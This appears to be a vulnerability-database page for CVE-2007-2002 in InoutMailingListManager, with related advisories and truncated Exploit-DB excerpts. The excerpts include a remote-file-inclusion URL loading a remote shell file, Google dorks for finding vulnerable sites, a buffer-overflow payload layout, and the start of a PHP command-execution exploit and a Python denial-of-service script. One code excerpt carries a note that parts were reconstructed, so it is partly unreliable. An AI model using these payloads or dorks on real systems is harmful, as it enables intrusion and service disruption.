CVE-2007-2002
published 2007-04-12
Priority P3 · 40 · medium · 6.8 (CVSS 2.0)
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 2.01% (78.4th percentile)
InoutMailingListManager 3.1 and earlier allows remote attackers to access certain restricted functionality, and upload and execute arbitrary PHP code, by setting an arbitrary admin cookie.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| inoutmailinglistmanager | inoutmailinglistmanager | <= 3.1 | — |
CVSS provenance
nvd · v2.0 · 6.8 MEDIUM · AV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat · 5.0 MEDIUM
GHSA
GHSA-82x2-77j4-6g2v: InoutMailingListManager 3
ghsa_unreviewed·2022-05-01
CVE-2007-2002 [MEDIUM] GHSA-82x2-77j4-6g2v: InoutMailingListManager 3
InoutMailingListManager 3.1 and earlier allows remote attackers to access certain restricted functionality, and upload and execute arbitrary PHP code, by setting an arbitrary admin cookie.
Red Hat
Flash plugin DNS rebinding
vendor_redhat·2007-10-08·CVSS 5.0
CVE-2007-5275 [MEDIUM] Flash plugin DNS rebinding
The Adobe Macromedia Flash 9 plug-in allows remote attackers to cause a victim machine to establish TCP sessions with arbitrary hosts via a Flash (SWF) movie, related to lack of pinning of a hostname to a single IP address after receiving an allow-access-from element in a cross-domain-policy XML document, and the availability of a Flash Socket class that does not use the browser's DNS pins, aka DNS rebinding attacks, a different issue than CVE-2002-1467 and CVE-2007-4324.
No detection rules found.
Exploit-DB
Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal
exploitdb·2007-11-29·CVSS 7.5
CVE-2002-0252 [HIGH] Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal
---
# Copyright (C) 2007 Subreption LLC. All rights reserved.
# Visit http://blog.subreption.com for exploit development notes.
#
# References:
# http://www.milw0rm.com/exploits/4648 (original Microsoft Windows code)
# http://www.milw0rm.com/exploits/4651 (recent Microsoft Windows exploit)
# From Metasploit: apple_quicktime_rtsp_response.rb (by MC and HD Moore)
# http://nvd.nist.gov/nvd.cfm?cvename=CVE-2002-0252
# BID: https://www.securityfocus.com/bid/26549
#
# Notes:
# Payload badchars: \x00 \x09 \x0a \x0d \x20 \x22 \x25 \x26 \x27 \x2b \x2f
# \x3a \x3c \x3e \x3f \x40
#
# The example addresses and data will trigger an IDS signature easily.
# Remove them if you're not testing, and change padding sizes accordingly.
# Use the
Exploit-DB
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
exploitdb·2007-10-22
CVE-2007-5627 Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
---
Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:
} else {
include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}
GrEeTs To sHaDoW sEcUrItY TeAm, str0ke
BiG sHoUt OuT tO udplink.net
FoUnD By BiNgZa
DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"
DORK2: "Powered by SocketMail"
shadow.php0h.com
# milw0rm.com [2007-10-22]
Exploit-DB
AtomixMP3 2.3 - '.pls' Local Buffer Overflow
exploitdb·2007-09-05
CVE-2007-4803 AtomixMP3 2.3 - '.pls' Local Buffer Overflow
---
0x77394540 jmp esp in mswsock.dll Winxp Pro Version 2002
exploit : [A x 516] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode ]
By : 0x58
greetz : miyyet,,diablos5s5,,vxroot,,Str0ke,,Metasploit
Moroccan Hackers !
*/
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
Exploit-DB
InoutMailingListManager 3.1 - Remote Command Execution
exploitdb·2007-04-10
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
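// Loop header and lower bound restored: extraction dropped the text between "$i" and "126"
// (assumed: bytes outside printable ASCII are shown as ".")
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) || (ord($string[$i]) > 126 ))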
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(get
Exploit-DB
PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb·2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
---
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] and contributors (see www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// display of the details for an author
require_once($base_path.'/includes/templates
Exploit-DB
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
exploitdb·2007-01-23
CVE-2007-0548 Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
---
#!/usr/bin/env python
import socket
print "-----------------------------------------------------------------------"
print "Sami HTTP Server HTTP 404 - Object not found Denial of Service"
print "url: http://www.karjasoft.com"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print ""
print "The server is unable to handle more than 2002 requests to nonexistents"
print "files, pages, folders etc."
print "When the number of requests exceed the 2002, it stops to answer, stops"
print "to write to log file and the admin will be unable to kick or ban users."
print "The only thing you can do is to kill the process."
print "-----------------------------------------
Exploit-DB
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosure
exploitdb·2002-05-29
CVE-2002-2007 Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosure
---
source: https://www.securityfocus.com/bid/4878/info
Apache Tomcat is a freely available, open source web server maintained by the Apache Foundation.
Under some circumstances, Tomcat may yield sensitive information about the web server configuration. When the realPath.jsp page is accessed, it may leak information. Upon being accessed, the realPath.jsp page will display the web root directory of the Tomcat implementation.
http://example.com/test/realPath.jsp
Exploit-DB
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure
exploitdb·2002-05-29
CVE-2002-2007 Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure
---
source: https://www.securityfocus.com/bid/4876/info
Apache Tomcat is a freely available, open source web server maintained by the Apache Foundation.
Under some circumstances, Tomcat may yield sensitive information about the web server configuration. When the source.jsp page is passed a malformed request, it may leak information. This information may include the web root directory, and possibly a directory listing.
http://example.com:80/examples/jsp/source.jsp??
http://example.com:80/examples/jsp/source.jsp?/jsp/
Exploit-DB
Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure
exploitdb·2002-05-29
CVE-2002-2007 Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure
---
source: https://www.securityfocus.com/bid/4877/info
Apache Tomcat is a freely available, open source web server maintained by the Apache Foundation.
When Apache Tomcat is installed with a default configuration, several example files are also installed. When some of these example files are requested without any input, they will return an error containing the absolute path to the server's web root.
The attacker can submit a request in one of the following formats:
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/te
Bugzilla
CVE-2007-5275 Flash plugin DNS rebinding
bugzilla·2007-11-05·CVSS 5.0
CVE-2007-5275 [MEDIUM] CVE-2007-5275 Flash plugin DNS rebinding
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5275 to the following vulnerability:
The Adobe Macromedia Flash 9 plug-in allows remote attackers to cause a victim machine to establish TCP sessions with arbitrary hosts via a Flash (SWF) movie, related to lack of pinning of a hostname to a single IP address after receiving an allow-access-from element in a cross-domain-policy XML document, and the availability of a Flash Socket class that does not use the browser's DNS pins, aka DNS rebinding attacks, a different issue than CVE-2002-1467 and CVE-2007-4324.
References:
http://crypto.stanford.edu/dns/dns-rebinding.pdf
Discussion:
Issue was addressed in supported products by:
https://rhn.redhat.com/errata/RHSA-2007-1126.html
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
2007-04-12
Published